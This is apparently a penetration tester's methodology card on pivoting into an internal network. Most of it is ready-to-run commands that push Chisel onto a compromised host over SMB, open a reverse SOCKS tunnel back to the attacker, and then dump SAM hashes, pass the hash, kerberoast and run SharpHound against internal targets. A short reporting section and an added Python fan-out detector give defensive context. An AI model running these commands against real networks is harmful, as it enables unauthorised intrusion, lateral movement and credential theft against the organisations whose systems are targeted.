🛡️ Methodology Checklist
- Start Chisel server on attacker: `./chisel server --reverse`
- Upload Chisel to pivot: `nxc smb [PIVOT] -u [USER] -p [PASS] --put-file ./chisel.exe \\Windows\\Temp\\chisel.exe`
- Connect pivot back: `nxc smb [PIVOT] -u [USER] -p [PASS] -x "C:\\Windows\\Temp\\chisel.exe client [LHOST]:8080 R:socks"`
- Verify SOCKS listener: `netstat -lnpt | grep 1080`
- Configure Proxychains: ensure `socks5 127.0.0.1 1080` is present in `[ProxyList]`
- Attack internal targets: `proxychains4 -q nxc smb [INTERNAL] -u [USER] -p [PASS] --shares`
- Cleanup: `nxc smb [PIVOT] -u [USER] -p [PASS] -X "Stop-Process -Name chisel -Force"`
🎯 Operational Context
Use when: Internal network accessible only through a pivot — run nxc through proxychains to attack internal targets from external position.
Think Dumber First: proxychains4 -q nxc smb [INTERNAL_SUBNET]/24 — same nxc commands, just prefixed with proxychains4 -q. The -q suppresses proxychains output noise. Ensure SOCKS proxy is running first.
Skip when: Direct network access available — proxychains adds latency; use direct connection where possible.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| ./chisel server --reverse | Start Chisel server on attacker with reverse tunnel enabled |
| nxc smb [PIVOT_IP] -u [USER] -p [PASS] --put-file ./chisel.exe \\Windows\\Temp\\chisel.exe | Upload Chisel binary to pivot host via NXC |
| nxc smb [PIVOT_IP] -u [USER] -p [PASS] -x "C:\Windows\Temp\chisel.exe client [LHOST]:8080 R:socks" | Create reverse SOCKS tunnel from pivot back to attacker |
| netstat -lnpt \| grep 1080 | Verify local SOCKS listener is up on attacker |
| sudo proxychains4 -q nxc smb [INTERNAL_TARGET] -u [USER] -p [PASS] --shares | Run NXC through Proxychains tunnel (-q = quiet) |
| sudo proxychains4 -q nxc winrm [INTERNAL_TARGET] -u [USER] -p [PASS] | WinRM through pivot |
| sudo proxychains4 -q nxc ldap [INTERNAL_DC_FQDN] -u [USER] -p [PASS] | LDAP through pivot |
| nxc smb [PIVOT_IP] -u [USER] -p [PASS] -X "Stop-Process -Name chisel -Force" | Kill Chisel process on pivot (cleanup) |
| nxc smb [PIVOT_IP] -u [USER] -p [PASS] -x "C:\Windows\Temp\chisel.exe server --socks5" | Alternative: pivot as Chisel server |
| sudo chisel client [PIVOT_IP]:8080 socks | Alternative: connect from Linux to pivot SOCKS server |
🔬 Deep Dive & Workflow
Pivot Scenario

```text
YOU (Kali)               PIVOT HOST                  INTERNAL TARGET
10.10.14.33 ←── VPN ───→ 10.129.204.133 ←── LAN ───→ 172.16.1.10
                         (dual-homed)
                          172.16.1.5
```

Goal: Attack 172.16.1.10 via the pivot host
Tool: Chisel (SOCKS tunnel) + Proxychains + NXC
Method 1: Reverse Tunnel (Pivot calls back to attacker)

```bash
# ATTACKER: Download binaries
wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz -O chisel.gz -q
gunzip -d chisel.gz && chmod +x chisel
wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_windows_amd64.gz -O chisel.exe.gz -q
gunzip -d chisel.exe.gz

# ATTACKER: Start reverse server
./chisel server --reverse
# → listening on 0.0.0.0:8080

# ATTACKER: Upload Chisel to pivot via NXC
nxc smb [PIVOT_IP] -u [USER] -p [PASS] --put-file ./chisel.exe \\Windows\\Temp\\chisel.exe

# PIVOT: Connect back to attacker and open SOCKS tunnel
nxc smb [PIVOT_IP] -u [USER] -p [PASS] -x "C:\Windows\Temp\chisel.exe client [LHOST]:8080 R:socks"
# → Command stays running (tunnel is active while process runs)

# ATTACKER: Verify tunnel is up
netstat -lnpt | grep 1080
# → 127.0.0.1:1080 LISTEN (chisel)

# ATTACKER: Configure Proxychains
grep -A 5 "\[ProxyList\]" /etc/proxychains.conf
# Must contain: socks5 127.0.0.1 1080
# If not: echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf

# ATTACKER: Attack internal target through tunnel
sudo proxychains4 -q nxc smb 172.16.1.10 -u [USER] -p [PASS] --shares
sudo proxychains4 -q nxc smb 172.16.1.10 -u [USER] -p [PASS] --users
sudo proxychains4 -q nxc winrm 172.16.1.10 -u [USER] -p [PASS]
sudo proxychains4 -q nxc ldap 172.16.1.10 -u [USER] -p [PASS]

# ATTACKER: Cleanup — kill Chisel on pivot
nxc smb [PIVOT_IP] -u [USER] -p [PASS] -X "Stop-Process -Name chisel -Force"

# ATTACKER: Stop Chisel server
# CTRL+C
```

Method 2: Pivot as SOCKS Server (Linux connects to Windows server)
```bash
# PIVOT: Start Chisel SOCKS server
nxc smb [PIVOT_IP] -u [USER] -p [PASS] -x "C:\Windows\Temp\chisel.exe server --socks5"
# → Chisel listens on pivot:8080

# ATTACKER: Connect to pivot as client
sudo chisel client [PIVOT_IP]:8080 socks
# → Creates local SOCKS listener on 127.0.0.1:1080

# Use Proxychains as before:
sudo proxychains4 -q nxc smb [INTERNAL_TARGET] -u [USER] -p [PASS] --shares
```

Proxychains with NXC — Full Protocol Coverage
```bash
# SMB — shares, users, spray, dump
sudo proxychains4 -q nxc smb [TARGET] -u [USER] -p [PASS] --shares
sudo proxychains4 -q nxc smb [TARGET] -u [USER] -p [PASS] --sam
sudo proxychains4 -q nxc smb [TARGET] -u [USER] -H [HASH]

# WinRM — PowerShell remoting
sudo proxychains4 -q nxc winrm [TARGET] -u [USER] -p [PASS]

# LDAP — AD enumeration (FQDN required)
sudo proxychains4 -q nxc ldap [DC_FQDN] -u [USER] -p [PASS] --kerberoasting kerb.txt

# MSSQL
sudo proxychains4 -q nxc mssql [TARGET] -u [USER] -p [PASS] -d [DOMAIN]

# SharpHound via proxychains (collect from internal DC)
sudo proxychains4 -q nxc smb [DC_IP] -u [USER] -p [PASS] -x "C:\Windows\Temp\SharpHound.exe -c All"
```

Troubleshooting
```bash
# Tunnel up but NXC can't connect:
netstat -lnpt | grep 1080   # confirm listener exists
# → If no listener: Chisel process may have died on pivot — re-run

# Proxychains config wrong:
grep -A5 "\[ProxyList\]" /etc/proxychains.conf
# → Must show: socks5 127.0.0.1 1080 (NOT socks4)

# Can pivot reach internal target?
nxc smb [PIVOT_IP] -u [USER] -p [PASS] -x "ping -n 2 [INTERNAL_TARGET]"
# → If no reply: pivot can't reach that IP — wrong route

# DNS issues for LDAP/Kerberos through tunnel:
# Add internal DC FQDN to /etc/hosts
echo "[INTERNAL_DC_IP] [DC_FQDN]" >> /etc/hosts

# Too much Proxychains output noise:
# Use -q (quiet mode): proxychains4 -q nxc ...
```

🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| proxychains nxc hangs | SOCKS proxy not running | Verify tunnel: netstat -lnpt \| grep [SOCKS_PORT]; restart SSH -D or Chisel tunnel |
| nxc through proxychains very slow | High latency through pivot | Use fewer threads: default nxc threading; avoid -t override through tunnel |
| DNS resolution fails through proxychains | Proxychains DNS not routed | Add target IPs to /etc/hosts; use IP not hostname; or set proxy_dns in proxychains.conf |
| SMB scan shows no hosts | Subnet not routed through tunnel | Confirm route: proxychains4 curl http://[INTERNAL_IP]; basic HTTP test before SMB |
| proxychains4 not found | Wrong package | Install: apt install proxychains4; note: proxychains and proxychains4 are different packages |
📝 Reporting Trigger
Finding Title: Internal Network Attacked via nxc Through SOCKS Pivot

Impact: Running nxc through a SOCKS proxy pivot provides complete attack capability against internal network resources from an external position, demonstrating that network segmentation alone is insufficient when an internal host is compromised.

Root Cause: Compromised host with access to multiple network segments allows an external attacker to proxy all attack traffic through the internal pivot.

Recommendation: Implement network micro-segmentation limiting pivot host connectivity. Deploy east-west traffic monitoring to detect unusual internal SMB/LDAP scanning patterns. Alert on bulk authentication attempts originating from non-DC internal hosts.
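The east-west detection the recommendation above asks for, as an added example that is not part of the original notes: it parses constructed authentication log lines and flags any non-DC internal host that authenticates to many distinct hosts inside a short window, which is the fan-out that proxychains-driven nxc sweeps from a dual-homed pivot produce. The log format, the DC address list and the thresholds are assumptions.

```python
"""Fan-out detector for east-west SMB/LDAP/WinRM authentication (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: a dual-homed host (172.16.1.5) authenticating to many
# internal hosts within seconds, a DC doing routine traffic, and one normal user.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z src=172.16.1.5 dst=172.16.1.10 proto=smb user=svc_acct result=success
2024-05-01T10:00:02Z src=172.16.1.5 dst=172.16.1.11 proto=smb user=svc_acct result=success
2024-05-01T10:00:02Z src=172.16.1.5 dst=172.16.1.12 proto=smb user=svc_acct result=failure
2024-05-01T10:00:03Z src=172.16.1.5 dst=172.16.1.13 proto=ldap user=svc_acct result=success
2024-05-01T10:00:04Z src=172.16.1.5 dst=172.16.1.14 proto=smb user=svc_acct result=success
2024-05-01T10:00:05Z src=172.16.1.5 dst=172.16.1.15 proto=winrm user=svc_acct result=success
2024-05-01T10:00:06Z src=172.16.1.2 dst=172.16.1.10 proto=ldap user=DC01$ result=success
2024-05-01T10:00:07Z src=172.16.1.2 dst=172.16.1.11 proto=smb user=DC01$ result=success
2024-05-01T10:05:00Z src=172.16.1.20 dst=172.16.1.2 proto=ldap user=alice result=success
"""

# Assumed DC addresses: DCs legitimately talk to many hosts and are excluded.
DOMAIN_CONTROLLERS = {"172.16.1.2"}

def parse_line(line):
    """Turn one 'ts key=value ...' line into a dict with a datetime 'ts'."""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = datetime.fromisoformat(ts.replace("Z", "+00:00"))
    return rec

def detect_fanout(log_text, window=timedelta(seconds=60), min_targets=5):
    """Return {src: sorted distinct targets} for every non-DC source that
    authenticates to at least min_targets different hosts within one window."""
    by_src = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            rec = parse_line(line)
            if rec["src"] not in DOMAIN_CONTROLLERS:
                by_src[rec["src"]].append((rec["ts"], rec["dst"]))
    alerts = {}
    for src, events in by_src.items():
        events.sort()  # sliding window over time-ordered events
        for i, (start, _) in enumerate(events):
            targets = {dst for ts, dst in events[i:] if ts - start <= window}
            if len(targets) >= min_targets:
                alerts[src] = sorted(targets)
                break
    return alerts

if __name__ == "__main__":
    for src, targets in detect_fanout(SAMPLE_LOG).items():
        print(f"ALERT: non-DC host {src} authenticated to {len(targets)} hosts: {targets}")
```

Tune window and min_targets to the environment's baseline; in the sample the pivot trips the alert while the DC and the single-target user do not.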